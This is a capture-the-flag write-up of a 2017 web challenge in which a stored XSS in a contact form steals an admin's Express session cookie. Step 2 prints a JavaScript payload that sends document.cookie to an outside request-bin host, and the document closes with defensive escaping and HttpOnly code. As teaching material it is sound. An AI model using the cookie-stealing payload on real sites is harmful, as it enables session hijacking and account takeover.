Here we go with another write-up! This one is from the Nuit du Hack 2017 Quals CTF, which took place on April 1st, 2017.

The following article describes the solution to the Purple Posse Market web challenge.

We participated with SwissMadeSecurity and ranked 99th out of 378.

Step 1: Reconnaissance

Host

http://purplepossemarket.quals.nuitduhack.com/

Description

You work for the government in the forensic department, you are investigating an illegal website which sells illegal drugs and weapons, you need to find a way to get the IBAN of the administrator of the website.

The target was a drugs-and-weapons e-commerce site that looked like it came straight from the golden age of 90s web design.

Navigating the menu, we found an About page with some information about order processing and other details.

There was also a simple page listing all products.

Selecting a product redirected us to /product/product_id, which showed the details of the chosen product and a simple form asking for an email address and the desired quantity.

We also noticed that some products were marked as unavailable.

Last but not least, we found a contact page stating that an admin would read our message and that the admin was currently online.

Trying various URLs, we found an admin panel at /admin that redirected us to /admin/login.

We then checked the cookies for anything interesting and found one named connect.sid. That is the default session cookie name of the express-session middleware, so the backend is Node.js with Express and this cookie is what identifies a logged-in session.

Putting this together after a quick recon: a contact form whose messages are read by a logged-in admin, an admin panel, and a session cookie that can be replayed if we get hold of it. The obvious hypothesis was that the contact form was vulnerable to stored XSS (Cross-Site Scripting), which would let us steal the admin's session cookie, log in as the admin and (hopefully) find the IBAN. This only works if the cookie is readable from JavaScript, i.e. it was set without the HttpOnly flag.

Let's now validate that assumption.

Step 2: Vulnerability Testing

We set up a request.bin endpoint and injected the following payload into the contact form. It creates an image whose source URL points at our bin and carries document.cookie in the query string, so the admin's browser sends us the cookie as soon as it renders our message:

var i = new Image();i.src="http://requestb.in/1kxo2b11?cookie="+document.cookie;


As expected, when the admin read the message his browser fetched the image URL and the session cookie landed in our bin. This also confirms that the cookie was set without the HttpOnly flag; otherwise document.cookie would not have contained it.

 

Step 3: Flag !

We then went back to the admin panel, replaced our own connect.sid value with the stolen one using the EditThisCookie Chrome extension and refreshed the page.

We got the desired effect!

The admin page showed the IBAN, which we submitted as-is to the scoreboard to complete the challenge.
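For the defensive side, as an added example that is not the challenge's own code: the two changes that break this chain are HTML-encoding the stored message before it is rendered in the admin page, and flagging the session cookie HttpOnly so document.cookie cannot read it even if an XSS slips through. The vulnerable and hardened renderers below are constructed for illustration; the express-session options object is shown as configuration only (express-session is not loaded here), and since express-session sets HttpOnly by default, the challenge must have switched it off for the payload to work.

```javascript
// Added example, not code from the Purple Posse Market challenge or write-up.

// Vulnerable rendering: the stored contact message is concatenated into HTML
// unchanged, so a <script> or <img onerror> in the message runs in the
// admin's browser when the panel lists the messages.
function renderMessageVulnerable(msg) {
  return `<div class="message">${msg}</div>`;
}

// Hardened rendering: encode the five characters that can break out of a
// text node or a quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}
function renderMessageSafe(msg) {
  return `<div class="message">${escapeHtml(msg)}</div>`;
}

// Session cookie options in the shape express-session expects. express-session
// sets HttpOnly by default; the challenge evidently disabled it (assumption,
// drawn from the fact that document.cookie contained connect.sid).
const sessionOptions = {
  name: 'connect.sid',
  secret: process.env.SESSION_SECRET || 'change-me', // assumption: supplied via env
  resave: false,
  saveUninitialized: false,
  cookie: {
    httpOnly: true, // keeps the cookie out of document.cookie, defeating the beacon
    secure: true,   // only sent over HTTPS
  },
};

// Check an auditor can run against a Set-Cookie response header: does the
// session cookie carry the HttpOnly attribute?
function setCookieHasHttpOnly(setCookieHeader, name = 'connect.sid') {
  const attrs = setCookieHeader.split(';').map((a) => a.trim());
  if (!attrs[0].startsWith(name + '=')) return false;
  return attrs.slice(1).some((a) => a.toLowerCase() === 'httponly');
}
```

Note that HttpOnly is a mitigation, not a fix: with the XSS still present an attacker can drive the admin's session from inside the page (for example by fetching /admin and exfiltrating the response) without ever reading the cookie. Output encoding is the actual fix; HttpOnly just removes the easiest win.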